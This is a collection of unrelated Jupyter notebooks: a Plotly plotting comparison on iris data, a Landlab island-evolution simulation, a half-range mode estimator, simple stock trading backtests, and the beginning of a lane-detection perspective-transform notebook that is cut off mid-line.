###Markdown `Plotly Express` vs `Graph_Objects` (go)* `Plotly Express` is new high level framework released in 2019.* However for some cases, we might still want to use old framework `Graph_Objects (go)`So we need to understand what is the differences between them. ###Code import plotly.express as px import plotly.graph_objects as go iris = px.data.iris() iris.head() ###Output _____no_output_____ ###Markdown Graphing with `plotly.express` ###Code iris.columns fig = px.scatter(iris, 'sepal_width', 'sepal_length', title='Sepal Width vs Sepal Lenght') fig.show() print(fig) ###Output Figure({ 'data': [{'hovertemplate': 'sepal_width=%{x}<br>sepal_length=%{y}<extra></extra>', 'legendgroup': '', 'marker': {'color': '#636efa', 'symbol': 'circle'}, 'mode': 'markers', 'name': '', 'orientation': 'v', 'showlegend': False, 'type': 'scatter', 'x': array([3.5, 3. , 3.2, 3.1, 3.6, 3.9, 3.4, 3.4, 2.9, 3.1, 3.7, 3.4, 3. , 3. , 4. , 4.4, 3.9, 3.5, 3.8, 3.8, 3.4, 3.7, 3.6, 3.3, 3.4, 3. , 3.4, 3.5, 3.4, 3.2, 3.1, 3.4, 4.1, 4.2, 3.1, 3.2, 3.5, 3.1, 3. , 3.4, 3.5, 2.3, 3.2, 3.5, 3.8, 3. , 3.8, 3.2, 3.7, 3.3, 3.2, 3.2, 3.1, 2.3, 2.8, 2.8, 3.3, 2.4, 2.9, 2.7, 2. , 3. , 2.2, 2.9, 2.9, 3.1, 3. , 2.7, 2.2, 2.5, 3.2, 2.8, 2.5, 2.8, 2.9, 3. , 2.8, 3. , 2.9, 2.6, 2.4, 2.4, 2.7, 2.7, 3. , 3.4, 3.1, 2.3, 3. , 2.5, 2.6, 3. , 2.6, 2.3, 2.7, 3. , 2.9, 2.9, 2.5, 2.8, 3.3, 2.7, 3. , 2.9, 3. , 3. , 2.5, 2.9, 2.5, 3.6, 3.2, 2.7, 3. , 2.5, 2.8, 3.2, 3. , 3.8, 2.6, 2.2, 3.2, 2.8, 2.8, 2.7, 3.3, 3.2, 2.8, 3. , 2.8, 3. , 2.8, 3.8, 2.8, 2.8, 2.6, 3. , 3.4, 3.1, 3. , 3.1, 3.1, 3.1, 2.7, 3.2, 3.3, 3. , 2.5, 3. , 3.4, 3. ]), 'xaxis': 'x', 'y': array([5.1, 4.9, 4.7, 4.6, 5. , 5.4, 4.6, 5. , 4.4, 4.9, 5.4, 4.8, 4.8, 4.3, 5.8, 5.7, 5.4, 5.1, 5.7, 5.1, 5.4, 5.1, 4.6, 5.1, 4.8, 5. , 5. , 5.2, 5.2, 4.7, 4.8, 5.4, 5.2, 5.5, 4.9, 5. , 5.5, 4.9, 4.4, 5.1, 5. , 4.5, 4.4, 5. , 5.1, 4.8, 5.1, 4.6, 5.3, 5. , 7. , 6.4, 6.9, 5.5, 6.5, 5.7, 6.3, 4.9, 6.6, 5.2, 5. , 5.9, 6. , 6.1, 5.6, 6.7, 5.6, 5.8, 6.2, 5.6, 5.9, 6.1, 6.3, 6.1, 6.4, 6.6, 6.8, 6.7, 6. , 5.7, 5.5, 5.5, 5.8, 6. , 5.4, 6. , 6.7, 6.3, 5.6, 5.5, 5.5, 6.1, 5.8, 5. , 5.6, 5.7, 5.7, 6.2, 5.1, 5.7, 6.3, 5.8, 7.1, 6.3, 6.5, 7.6, 4.9, 7.3, 6.7, 7.2, 6.5, 6.4, 6.8, 5.7, 5.8, 6.4, 6.5, 7.7, 7.7, 6. , 6.9, 5.6, 7.7, 6.3, 6.7, 7.2, 6.2, 6.1, 6.4, 7.2, 7.4, 7.9, 6.4, 6.3, 6.1, 7.7, 6.3, 6.4, 6. , 6.9, 6.7, 6.9, 5.8, 6.8, 6.7, 6.7, 6.3, 6.5, 6.2, 5.9]), 'yaxis': 'y'}], 'layout': {'legend': {'tracegroupgap': 0}, 'template': '...', 'title': {'text': 'Sepal Width vs Sepal Lenght'}, 'xaxis': {'anchor': 'y', 'domain': [0.0, 1.0], 'title': {'text': 'sepal_width'}}, 'yaxis': {'anchor': 'x', 'domain': [0.0, 1.0], 'title': {'text': 'sepal_length'}}} }) ###Markdown ------- Graphing with `graph_objects` ###Code fig = go.Figure(data=go.Scatter(x=iris['sepal_width'], y=iris['sepal_length'], mode='markers')) fig.update_layout( title='Sepal Width vs Sepal Length', xaxis_title='sepal_width', yaxis_title='sepal_length' ) fig.show() print(fig) ###Output Figure({ 'data': [{'mode': 'markers', 'type': 'scatter', 'x': array([3.5, 3. , 3.2, 3.1, 3.6, 3.9, 3.4, 3.4, 2.9, 3.1, 3.7, 3.4, 3. , 3. , 4. , 4.4, 3.9, 3.5, 3.8, 3.8, 3.4, 3.7, 3.6, 3.3, 3.4, 3. , 3.4, 3.5, 3.4, 3.2, 3.1, 3.4, 4.1, 4.2, 3.1, 3.2, 3.5, 3.1, 3. , 3.4, 3.5, 2.3, 3.2, 3.5, 3.8, 3. , 3.8, 3.2, 3.7, 3.3, 3.2, 3.2, 3.1, 2.3, 2.8, 2.8, 3.3, 2.4, 2.9, 2.7, 2. , 3. , 2.2, 2.9, 2.9, 3.1, 3. , 2.7, 2.2, 2.5, 3.2, 2.8, 2.5, 2.8, 2.9, 3. , 2.8, 3. , 2.9, 2.6, 2.4, 2.4, 2.7, 2.7, 3. , 3.4, 3.1, 2.3, 3. , 2.5, 2.6, 3. , 2.6, 2.3, 2.7, 3. , 2.9, 2.9, 2.5, 2.8, 3.3, 2.7, 3. , 2.9, 3. , 3. , 2.5, 2.9, 2.5, 3.6, 3.2, 2.7, 3. , 2.5, 2.8, 3.2, 3. , 3.8, 2.6, 2.2, 3.2, 2.8, 2.8, 2.7, 3.3, 3.2, 2.8, 3. , 2.8, 3. , 2.8, 3.8, 2.8, 2.8, 2.6, 3. , 3.4, 3.1, 3. , 3.1, 3.1, 3.1, 2.7, 3.2, 3.3, 3. , 2.5, 3. , 3.4, 3. ]), 'y': array([5.1, 4.9, 4.7, 4.6, 5. , 5.4, 4.6, 5. , 4.4, 4.9, 5.4, 4.8, 4.8, 4.3, 5.8, 5.7, 5.4, 5.1, 5.7, 5.1, 5.4, 5.1, 4.6, 5.1, 4.8, 5. , 5. , 5.2, 5.2, 4.7, 4.8, 5.4, 5.2, 5.5, 4.9, 5. , 5.5, 4.9, 4.4, 5.1, 5. , 4.5, 4.4, 5. , 5.1, 4.8, 5.1, 4.6, 5.3, 5. , 7. , 6.4, 6.9, 5.5, 6.5, 5.7, 6.3, 4.9, 6.6, 5.2, 5. , 5.9, 6. , 6.1, 5.6, 6.7, 5.6, 5.8, 6.2, 5.6, 5.9, 6.1, 6.3, 6.1, 6.4, 6.6, 6.8, 6.7, 6. , 5.7, 5.5, 5.5, 5.8, 6. , 5.4, 6. , 6.7, 6.3, 5.6, 5.5, 5.5, 6.1, 5.8, 5. , 5.6, 5.7, 5.7, 6.2, 5.1, 5.7, 6.3, 5.8, 7.1, 6.3, 6.5, 7.6, 4.9, 7.3, 6.7, 7.2, 6.5, 6.4, 6.8, 5.7, 5.8, 6.4, 6.5, 7.7, 7.7, 6. , 6.9, 5.6, 7.7, 6.3, 6.7, 7.2, 6.2, 6.1, 6.4, 7.2, 7.4, 7.9, 6.4, 6.3, 6.1, 7.7, 6.3, 6.4, 6. , 6.9, 6.7, 6.9, 5.8, 6.8, 6.7, 6.7, 6.3, 6.5, 6.2, 5.9])}], 'layout': {'template': '...', 'title': {'text': 'Sepal Width vs Sepal Length'}, 'xaxis': {'title': {'text': 'sepal_width'}}, 'yaxis': {'title': {'text': 'sepal_length'}}} })
evolve_island_world_gmd2106.ipynb
###Markdown Evolve Island World*(Greg Tucker, University of Colorado Boulder, spring 2021)*(Version GMD2106)Demonstration of a Landlab-built simulation of the morphological evolution of a hypothetical island micro-continent.This version was configured to generate an illustration to accompany a manuscript by Tucker et al., submitted to Geoscientific Model Development in summer 2021. Set up and initialize ###Code from landlab.io.native_landlab import load_grid, save_grid from landlab import imshow_grid, RasterModelGrid import time import numpy as np import matplotlib as mpl import matplotlib.pyplot as plt import copy import cmocean import datetime ###Output _____no_output_____ ###Markdown Set parameters ###Code # Parameters: subaerial erosion/transport/deposition K_br = 1.0e-5 # fluvial erosion coefficient, 1/y v_s = 1.0 # fluvial deposition parameter, - # Parameters: submarine sediment transport sea_level_delta = 0.4 # scale factor for random SL variation, m wave_base = 50.0 # depth to wave base, m marine_diff = 100.0 # marine sediment diffusivity, m2/y # Parameters: tectonics and flexure extension_rate = 0.01 # horizontal extension rate, m/y fault_dip = 60.0 # surface fault dip, degrees fault_location = 4.0e4 # location parameter for fault, m detachment_depth = 1.0e4 # depth to decollement, m effective_elastic_thickness = 1.0e4 # elastic thickness, m crust_datum = -1.5e4 # depth to datum in crust, m unit_wt = 2650.0 * 9.8 # unit weight of load, kg / m s2 # Parameters: numerics and run control dt = 100.0 # time-step duration, y num_iter = 2500 # number of iterations plot_interval = 2000.0 # time interval for plotting, y save_interval = 25000.0 # time interval for saving grid, y ndigits = 3 # number of digits for output files seed = 1 # random seed # Parameters: plotting and display max_elev_for_color_scale = 1650.0 # elevation for color scale in plotting, m scale_fac_for_surface_water = 0.3 # surface water gets color equiv to -this times above scale, - area_threshold = 5.0e7 # minimum drainage area for displayed streams, m2 # Derived or initial parameters current_sea_level = 0.0 next_plot = plot_interval # next time to plot next_save = save_interval # next time to save grid frame_num = 0 # current output image frame number save_num = 0 # current save file frame number save_name = 'rift-island-save' # Other initialization np.random.seed(seed) sea_level = [] # list of sea-level values over time ###Output _____no_output_____ ###Markdown Load grid and topographyWe start with a previously generated hex grid. This grid includes a topography field that represents a quasi-circular oceanic plateau. We also want to record the perimeter node IDs so we can work with them later. ###Code grid = load_grid('initial_island.grid') z = grid.at_node['topographic__elevation'] perimeter_nodes = grid.status_at_node != grid.BC_NODE_IS_CORE ###Output _____no_output_____ ###Markdown Display initial topography ###Code cmap = copy.copy(mpl.cm.get_cmap("seismic")) scale = np.amax(np.abs(z)) imshow_grid(grid, z, vmin=-scale, vmax=scale, cmap=cmap) ###Output _____no_output_____ ###Markdown Create a raster grid for flexureThe 2D elastic lithosphere flexure component `Flexure` requires a raster grid (not hex). We will therefore define a separate raster grid for this operation. The grid has the same number of rows and columns as the hex grid, and the same spacing on the two axes. Theonly difference is that the hex grid has alternate rows offset by half a grid width. (Because we assume that the flexural wavelength is much longer than this, we don't bother interpolating between the grids.) ###Code flex_rast_grid = RasterModelGrid((grid.number_of_node_rows, grid.number_of_node_columns), xy_spacing=(grid.spacing, 0.866 * grid.spacing)) ###Output _____no_output_____ ###Markdown Create grid fieldsIn addition to the `topographic__elevation` field, and the output fields created by the various Components, we need the following fields:- *Water surface elevation:* the "filled topography" field used by the flow routing and depression-filling algorithms (using a separate field allows us to fill depressions with water rather than raising the topographic elevations).- *Subaerial flag:* boolean field indicating whether a given node is above current relative sea level.- *Cumulative deposit thickness:* used to track the thickness of sediment and (where negative) cumulative exhumation.- *Upper crust thickness:* used in flexural isostasy calculations to keep track of the time- and space-varying load.- *Load:* the weight per unit area of rock/sediment (note: in this version we do not track water loading, though ultimately one should). ###Code # Add field(s) wse = grid.add_zeros('water_surface__elevation', at='node', clobber=True) subaerial = grid.add_zeros('is_subaerial', at='node', dtype=bool, clobber=True) cum_depo = grid.add_zeros('cumulative_deposit_thickness', at='node') thickness = grid.add_zeros('upper_crust_thickness', at='node') load = flex_rast_grid.add_zeros( 'lithosphere__overlying_pressure_increment', at='node' ) ###Output _____no_output_____ ###Markdown Import ComponentsHere we import the Components needed for this model:- FlowAccumulator: handles subaerial routing of surface-water flow. Also creates a FlowDirectorSteepest and a LakeMapperBarnes.- ErosionDeposition: handles erosion and deposition by fluvial processes, using the Davy & Lague (2009) equations.- SimpleSubmarineDiffuser: transports sediment under water using diffusion with a coefficient that varies with local water depth.- ListricKinematicExtender: calculates tectonic extension on an idealized listric normal fault, with periodic horizontal shift of topography in the hangingwall.- Flexure: handles 2D elastic lithosphere flexure. ###Code from landlab.components import (FlowAccumulator, ErosionDeposition, SimpleSubmarineDiffuser, ListricKinematicExtender, Flexure ) ###Output _____no_output_____ ###Markdown Instantiate ComponentsNote that Flexure gets its own grid. ###Code fa = FlowAccumulator(grid, depression_finder='LakeMapperBarnes', fill_surface=wse, redirect_flow_steepest_descent=True, reaccumulate_flow=True) ed = ErosionDeposition(grid, K=K_br, v_s=v_s, solver='adaptive') sd = SimpleSubmarineDiffuser(grid, sea_level=0.0, wave_base=wave_base, shallow_water_diffusivity=marine_diff) ke = ListricKinematicExtender(grid, extension_rate=extension_rate, fault_dip=fault_dip, fault_location=fault_location, detachment_depth=detachment_depth, track_crustal_thickness=True ) fl = Flexure(flex_rast_grid, eet=effective_elastic_thickness, method='flexure' ) ###Output _____no_output_____ ###Markdown Define sea level functionThis function adds or subtracts a random amount to the current sea level. ###Code def sea_level_random(current_sea_level, delta): return current_sea_level + delta * np.random.randn() ###Output _____no_output_____ ###Markdown Set up flexure and tectonic subsidenceTo initialize calculation of flexural isostasy and rift-related subsidence, we need to calculate:- the starting crustal thickness (above the datum, which is arbitrary)- the load created by this thickness- the initial lithospheric deflection (calculated via a call to Flexure.update())We save this initial deflection, so that for each time step we can calculate the net deflection over time (in other words, the initial deflection is assumed to be "already accounted for" in the initial topography).We also create a shorthand variable, *cum_subs*, to access the cumulative subsidence field. ###Code # Prepare flexure and tectonic subsidence thickness[:] = z - crust_datum load[:] = unit_wt * thickness fl.update() deflection = flex_rast_grid.at_node['lithosphere_surface__elevation_increment'] init_deflection = deflection.copy() cum_subs = grid.at_node['cumulative_subsidence_depth'] # for tracking purposes init_thickness = thickness.copy() ###Output _____no_output_____ ###Markdown Create a display functionThis function displays the current topography, and saves a plot to file. ###Code def display_island(grid, current_sea_level, frame_num, ndigits): z = grid.at_node['topographic__elevation'] fa.run_one_step() # re-run flow router to update the water-surface height wse = grid.at_node['water_surface__elevation'] fresh_water_elev_scale = -(scale_fac_for_surface_water * max_elev_for_color_scale) earth_sea = z - current_sea_level area = grid.at_node['drainage_area'] is_channel_or_flooded = np.logical_or(area > area_threshold, wse > z) is_fresh_water = np.logical_and(is_channel_or_flooded, earth_sea > 0.0) earth_sea[is_fresh_water] = fresh_water_elev_scale imshow_grid(grid, earth_sea, cmap=cmocean.cm.topo, vmin=-max_elev_for_color_scale, vmax=max_elev_for_color_scale) plt.axis(False) plt.savefig('island' + str(frame_num).zfill(ndigits) + '.png') ###Output _____no_output_____ ###Markdown Display the starting topographyCreate an image of the starting condition. ###Code display_island(grid, 0.0, 0, ndigits) ###Output _____no_output_____ ###Markdown Run Tectonics and flexureThe kinematic extender updates the cumulative subsidence created by the fact that the hangingwall is sliding down a listric ramp. The load is then calculated based on the current thickness minus what has been lost to subsidence (because subsidence comes from local thinning of the crust as the hangingwall slides by, in general replacing a thicker slice with a thinner one). The isostatic deflection is calculated based on the updated load. The topography is then updated by adding the thickness field to the crustal datum elevation, and subtracting the cumulative subsidence plus the isostatic subsidence (which in many places will be negative, i.e., isostatic uplift in response to tectonic and erosional thinning). Sea levelCurrent sea level is updated, and appended to the list to keep track of sea-level history. Subaerial and submarine nodes are identified based on the new sea level. Copying present topographyWe make a copy of the topography at this point in order to later calculate the *change* in topography due to erosion and sedimentation. Subaerial erosion and depositionIn order to restrict subaerial flow routing and fluvial erosion/deposition to land only, we change the boundary status such that all submarine nodes are flagged as boundary (fixed-value) nodes. We then run the flow-routing algorithms, followed by running the ErosionDeposition (fluvial) Component for one time step. Submarine erosion and depositionIn order to keep track of sediment delivered to the shoreline by rivers, we take the fluvial sediment-influx field, which is in m3/y, and convert it to a deposition rate by dividing by cell area. For submarine nodes, which were previously treated as boundaries and so were not updated for deposition, we now deposit this material by adding one time step's worth of deposition.We now apply submarine water-depth-dependent diffusion. This calculation will be applied to the entire grid, with an arbitrarily small diffusion coefficient applied to subaerial nodes. To enable this, we switch the boundary status of submarine nodes back to CORE, while keeping the perimeter nodes as open (fixed-value) boundaries. Cumulative erosion and depositionWe update the cumulative erosion/deposition by differencing the topography before and after this latest time step (because we copied the topography *after* doing tectonics and flexure, we include here only the effects of erosion and deposition). Updating crustal thicknessWe need to keep track of crustal thickness for the flexure calculations. Here we modify crustal thickness by adding/subtracting and deposition/erosion during this time step. Plotting and savingWe periodically pause to plot an image of the model to a file, and/or to save the run to a Landlab .grid file. ###Code for i in range(1, num_iter + 1): print(i) # Tectonic extension & flexure ke.run_one_step(dt) # update extensional subsidence load[grid.core_nodes] = (unit_wt * (thickness[grid.core_nodes] - cum_subs[grid.core_nodes])) fl.update() # update flexure z[:] = (crust_datum + thickness - (cum_subs + (deflection - init_deflection))) # Adjust sea level current_sea_level = sea_level_random(current_sea_level, sea_level_delta) print('Sea level = ' + str(current_sea_level) + ' m') sea_level.append(current_sea_level) subaerial[:] = z > current_sea_level submarine = np.invert(subaerial) # Remember previous topo z0 = z.copy() # Subaerial erosion # a. make the submarine nodes open boundaries grid.status_at_node[submarine] = grid.BC_NODE_IS_FIXED_VALUE grid.status_at_node[subaerial] = grid.BC_NODE_IS_CORE # b. route flow fa.run_one_step() # c. do some erosion ed.run_one_step(dt) # Submarine deposition depo_rate = ed._qs_in / grid.area_of_cell[0] z[submarine] += depo_rate[submarine] * dt # Submarine diffusion # a. make the submarine nodes core grid.status_at_node[submarine] = grid.BC_NODE_IS_CORE grid.status_at_node[perimeter_nodes] = grid.BC_NODE_IS_FIXED_VALUE # b. diffuse sd.sea_level = current_sea_level sd.run_one_step(dt) # Cumulative depo cum_depo[grid.core_nodes] += z[grid.core_nodes] - z0[grid.core_nodes] # Update crustal thickness thickness[grid.core_nodes] += z[grid.core_nodes] - z0[grid.core_nodes] # Plot if i*dt >= next_plot: frame_num += 1 plt.clf() display_island(grid, current_sea_level, frame_num, ndigits) next_plot += plot_interval # Save if i*dt >= next_save: save_num += 1 this_save_name = (save_name + str(save_num).zfill(ndigits) + '.grid') save_grid(grid, this_save_name, clobber=True) next_save += save_interval ###Output _____no_output_____ ###Markdown FinalizeHere we do some plotting of the model's state at the end of the run. Topography & bathymetryNote that bathymetry is cut off; colors indicating the deepest should be take as that deep OR DEEPER. ###Code import cmocean import datetime area_threshold = 5e7 za = grid.at_node['topographic__elevation'] - current_sea_level cscale = 1500.0 deep_water_scale = -cscale river_scale = -0.5 * cscale river = np.logical_and( grid.at_node['drainage_area'] > area_threshold, za > 0.0 ) za[river] = river_scale za[za < deep_water_scale] = deep_water_scale fa.run_one_step() lake = np.logical_and(wse > z, za > 0.0) za[lake] = river_scale imshow_grid(grid, za, cmap=cmocean.cm.topo, vmin=-cscale, vmax=cscale) plt.axis(False) figname = ('rift-island-t' + str(int(num_iter * dt)) + '-' + datetime.date.today().strftime('%y%m%d') + '.pdf' ) plt.savefig(figname) ###Output _____no_output_____ ###Markdown Cumulative deposition/erosion ###Code cdep = cum_depo.copy() cdep[perimeter_nodes] = 0.0 dmax = np.amax(np.abs(cdep)) imshow_grid(grid, cdep, cmap='Spectral', vmin=-dmax, vmax=dmax) plt.axis(False) plt.savefig('cum_depo.png') ###Output _____no_output_____ ###Markdown Sea-level history ###Code plt.plot(0.001 * dt * np.arange(len(sea_level)), sea_level) plt.xlabel('Time since start of run (ky)') plt.ylabel('Sea level (m)') plt.title('Sea level history') plt.grid(True) ###Output _____no_output_____ ###Markdown Cross-sectional profile ###Code startnode = ((grid.number_of_node_rows // 2) * grid.number_of_node_columns) endnode = startnode + grid.number_of_node_columns midrow = np.arange(startnode, endnode, dtype=int) x = 0.001 * grid.spacing * np.arange(0.0, len(midrow)) plt.figure() plt.plot(x, z[midrow] - np.maximum(cdep[midrow], 0.0), 'k:', label='Basement') plt.plot(x, z[midrow], 'g', label='Surface') plt.plot([0, max(x)], [current_sea_level, current_sea_level], label='Sea level' ) plt.xlabel('Distance (km)') plt.ylabel('Elevation (m)') plt.legend() plt.grid(True) ###Output _____no_output_____ ###Markdown Flexure ###Code net_flex = init_deflection - deflection imshow_grid(flex_rast_grid, net_flex) ###Output _____no_output_____
Half Range Mode Estimation.ipynb
###Markdown from scipy.stats import normimport matplotlib.pyplot as pltimport numpy as npimport math%matplotlib inline ###Code beta = 0.5 # Example of [1,2,2,3,4] def HRM(v, N): #print() #print("v", v) #print('len(v)', len(v)) # Step 2 # If we only have 1 or 2 values, just return their mean if N == 1 or N == 2: return v.mean() # Step 3 # calculate the interval width, this method gets it's name # with a Beta of 0.5 or half-width. Other Beta values can # be used for different effects # This is half the width of the full range of data w = beta*(v[-1]-v[0]) #print("w", w) # Step 4 # Create N-1 intervals called I # each interval is of w width I=[] for j in range(0, N-1): # j = 1 to N-1, paper is 1 based index I.append((v[j], v[j]+w) ) I = np.array(I) #print('I', I) #print('len I', len(I)) # Step 4.5 # for each interval, determine how many values are in each interval cnt = np.array([((rng[0] <= v) & (v <= rng[1])).sum() for rng in I]) N_prime = max(cnt) #print('cnt', cnt) #print('len(cnt)', len(cnt)) #print("N_prime", N_prime) # Step 5 if (cnt == N_prime).sum() == 1: J = I[np.where(cnt == N_prime)[0][0]] v = v[np.logical_and(v>=J[0], v<=J[1])] return HRM(v, len(v)) # Step 6 IJ = [] for Ii in I[cnt==N_prime]: IJ.append(v[(Ii[0]<=v) & (v<=Ii[1])]) # Step 7 w_prime = np.ptp(IJ, axis=1).min() # Step 8 Vmin = v[-1] # default to our array's min/max Vmax = v[0] for IJi in IJ: if (IJi[-1]-IJi[0]) == w_prime: if (IJi[0]<Vmin): Vmin = IJi[0] if (IJi[-1]>Vmax): Vmax = IJi[-1] # Step 9 min_index = np.argmax(v==Vmin) v_back = v[::-1] max_index = len(v)-np.argmax(v_back==Vmax)-1 N_prime_prime = max_index-min_index+1 # Step 10 v = v[min_index:max_index+1] # Step 11 if N == N_prime_prime: # this should not happen for continous data, but regardless we need to have a case for it # Essentially this means that we did not progress this itteration if (v[2]-v[1]) < (v[-1]-v[-2]): v = v[:-1] N_prime_prime = N_prime_prime - 1 elif (v[2]-v[1]) > (v[-1]-v[-2]): v = v[1:] N_prime_prime = N_prime_prime - 1 else: v = v[1:-1] N_prime_prime = N_prime_prime - 2 # Step 12 N = N_prime_prime return HRM(v, N) def graph(modal, numBins, title): count, bins, ignored = plt.hist(modal, numBins) modal.sort() hrm = HRM(modal, len(modal)) mean=modal.mean() median=np.median(modal) handles=[] handles.append(plt.axvline(x=hrm, color='fuchsia', label='Half-Range: {0:.2f}'.format(hrm))) handles.append(plt.axvline(x=mean, color='y', label='Mean: {0:.2f}'.format(mean))) handles.append(plt.axvline(x=median, color='g', label='Median: {0:.2f}'.format(median))) plt.legend(handles=handles) plt.title(title, {'fontsize': 20}) plt.show() modal = np.random.normal(10, 3, 5000) graph(modal, 40, 'Normal Distribution') modal = np.random.exponential(2, 5000) graph(modal, 40, 'Exponential Distribution') modal1 = np.random.normal(10, 3, 2500) modal2 = np.random.normal(20, 3, 2500) modal = np.concatenate((modal1, modal2)) graph(modal, 40, 'Bi-Modal Distribution') modal = np.random.lognormal(10, 0.7, 5000) graph(modal, 40, 'Log Normal Distribution') ###Output _____no_output_____
ipython/qa.ipynb
###Markdown 7. 量化交易 ###Code data['close'].plot() bors = data.loc['2016-07-01':] k, b = calc.linear_regression_kb(bors['close'].values); degree = np.rad2deg(k) model, zoom_factor = calc.linear_regression_y(bors['close'].values, zoom=True) k2 = model.params[1] b2 = model.params[0] degree2 = np.rad2deg(k2) x = np.arange(0, bors['close'].shape[0]) reg_y_fit = x * k + b reg_y_fit2 = x * k2 + b2 _, axes = plt.subplots(nrows=1, ncols=2, figsize=(20, 5)) axes[0].set_title(f"No zoom. degree={degree}") axes[0].plot(x, bors['close'].values, '') axes[0].plot(x, reg_y_fit, 'r') axes[1].set_title(f"with zoom, degree={degree2}") axes[1].plot(x, bors['close'].values, '') axes[1].plot(x, reg_y_fit2/zoom_factor, 'r') ###Output _____no_output_____ ###Markdown 7.1 均值回复策略- train dataset是过去第二年的数据。- test dataset是过去一年的数据。 ###Code Y1=-252 train = data.iloc[Y1*2:Y1];train.head() train.shape test = data.iloc[Y1:];test.head() test.shape close_mean = train.close.mean() close_std = train.close.std() sell_signal = close_mean + close_std / 3 buy_signal = close_mean - close_std /3 plt.figure(figsize=(20,7)) plt.title(f"Train dataset: close_mean={close_mean}, close_std={close_std}") train.close.plot() plt.axhline(buy_signal, color='r', lw=3) plt.axhline(close_mean, color='black', lw=1) plt.axhline(sell_signal, color='g', lw=3) plt.legend(['train close', f'buy signal({buy_signal})', f'close mean({close_mean})', f'sell signal({sell_signal})'], loc='best') plt.figure(figsize=(20,7)) plt.title(f"Test dataset: close_mean={close_mean}, close_std={close_std}") test.close.plot() plt.axhline(buy_signal, color='r', lw=3) plt.axhline(close_mean, color='black', lw=1) plt.axhline(sell_signal, color='g', lw=3) plt.legend(['train close', f'buy signal({buy_signal})', f'close mean({close_mean})', f'sell signal({sell_signal})'], loc='best') test.loc[test['close'] <= buy_signal, 'signal'] = 1 test.loc[test['close'] >= sell_signal,'signal'] = 0 test['keep'] = test['signal'] test['keep'].fillna(method='ffill', inplace=True) #test.loc['2017-03-01':'2017-05-01'] ###Output /opt/conda/lib/python3.6/site-packages/ipykernel_launcher.py:1: SettingWithCopyWarning: A value is trying to be set on a copy of a slice from a DataFrame. Try using .loc[row_indexer,col_indexer] = value instead See the caveats in the documentation: http://pandas.pydata.org/pandas-docs/stable/indexing.html#indexing-view-versus-copy """Entry point for launching an IPython kernel. /opt/conda/lib/python3.6/site-packages/pandas/core/generic.py:3191: SettingWithCopyWarning: A value is trying to be set on a copy of a slice from a DataFrame See the caveats in the documentation: http://pandas.pydata.org/pandas-docs/stable/indexing.html#indexing-view-versus-copy self._update_inplace(new_data) ###Markdown > benchmark_profit2 is to indicate benchmark_profit is correct.> we can use ***np.log(close / close.shift(1))*** to calculate profit ###Code test['benchmark_profit'] = np.log(test['close'] / test['close'].shift(1)) test['benchmark_profit2'] = (test['close'] - test['close'].shift(1)) /test['close'].shift(1) test[['benchmark_profit','benchmark_profit2']].plot(subplots=True, grid=True, figsize=(14,7)) test.head() test['trend_profit'] = test['keep'] * test['benchmark_profit'] test['trend_profit'].plot(figsize=(20, 7)) #test.loc['2017-03-01':'2017-05-01'] test[['benchmark_profit', 'trend_profit']].cumsum().plot(grid=True, figsize=(20, 7)) ###Output _____no_output_____ ###Markdown > ***np.exp***显示了更好的投资回报率(1.2),而不是增长率 ###Code test[['benchmark_profit', 'trend_profit']].cumsum().apply(np.exp).plot(grid=True, figsize=(20, 7)) ###Output _____no_output_____ ###Markdown 2. 趋势跟踪策略N1: N1天内的最高价格,为买入信号N2: N2天内的最低加个,为卖出信号N1>N2 ###Code N1=42 N2=21 test = data.loc['2016-06-1':]; test.head() test['n1_high'] = test['high'].rolling(N1).max() test['n2_low'] = test['low'].rolling(N2).min() expan_max = test['close'].expanding().max() expan_min = test['low'].expanding().min() test['n1_high'].fillna(value=expan_max, inplace=True) test['n2_low'].fillna(value=expan_min, inplace=True) test.head() test.loc[test['close']>test['n1_high'].shift(1), 'signal'] = 1 test.loc[test['close']<test['n2_low'].shift(1), 'signal'] = 0 test.head() test['keep'] = test['signal'].shift(1) test['keep'].fillna(method='ffill', inplace=True) test['benchmark_profit'] = np.log(test['close']/test['close'].shift(1)) test['trend_profit'] = test['keep'] * test['benchmark_profit'] test[['benchmark_profit', 'trend_profit']].cumsum().apply(np.exp).plot(grid=True, figsize=(20, 7)) #test.loc['2016-10-15':'2016-11-15'] ###Output _____no_output_____
examples/03-PerspectiveTransform.ipynb
###Markdown Advanced Lane Finding ProjectThe goals / steps of this project are the following:* Compute the camera calibration matrix and distortion coefficients given a set of chessboard images.* Apply a distortion correction to raw images.* Use color transforms, gradients, etc., to create a thresholded binary image.* **Apply a perspective transform to rectify binary image ("birds-eye view").*** **Detect lane pixels and fit to find the lane boundary.*** **Determine the curvature of the lane and vehicle position with respect to center.*** **Warp the detected lane boundaries back onto the original image.*** **Output visual display of the lane boundaries and numerical estimation of lane curvature and vehicle position.**--- Apply a perspective transform to rectify binary image ###Code import numpy as np import cv2 import glob import matplotlib.pyplot as plt import pickle %matplotlib inline ym_per_pix = 30 / 720 xm_per_pix = 3.7 / 700 parameters = pickle.load(open('./camera_calibration_parameters', 'rb')) mtx, dist = map(parameters.get, ('mtx', 'dist')) def region_lines(origin_img, vertices): img = origin_img.copy() for i in range(vertices.shape[1]-1): cv2.line(img, tuple(tuple(vertices[:, i])[0]), tuple(tuple(vertices[:, i+1])[0]), (0, 255, 0), 10) cv2.line(img, tuple(tuple(vertices[:, vertices.shape[1]-1])[0]), tuple(tuple(vertices[:, 0])[0]), (0, 255, 0), 10) return img img = cv2.imread('../test_images/test3.jpg') img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) undist = cv2.undistort(img, mtx, dist, None, mtx) imshape = undist.shape vertices = np.array([[(200, imshape[0]), (imshape[1]/2-40, imshape[0]*.6), (imshape[1]/2+40, imshape[0]*.6), (1200, imshape[0])]], dtype=np.float32) img_with_region_lines = region_lines(img, vertices) plt.imshow(img_with_region_lines) plt.imshow(img) gray = cv2.cvtColor(undist, cv2.COLOR_BGR2GRAY) src = vertices X, Y = imshape[1], imshape[0] offset = 200 dst = np.float32([ (offset, Y), (offset, 0), (X-offset, 0), (X-offset, Y) ]) print (src) print (dst) def bird_eye(img, src, dist): h, w = img.shape[:2] M = cv2.getPerspectiveTransform(src, dst) Minv = cv2.getPerspectiveTransform(dst, src) warped = cv2.warpPerspective(img, M, (w, h), flags=cv2.INTER_LINEAR) return warped, M, Minv binary_warped, M, Minv = bird_eye(undist, src, dst) #plt.imshow(binary_warped) cv2.line(binary_warped, (200, 720), (200, 0), (0, 255, 0), 10) cv2.line(binary_warped, (1080, 720), (1080, 0), (0, 255, 0), 10) plt.imshow(binary_warped, cmap='gray') fig, (ax1, ax2) = plt.subplots(1, 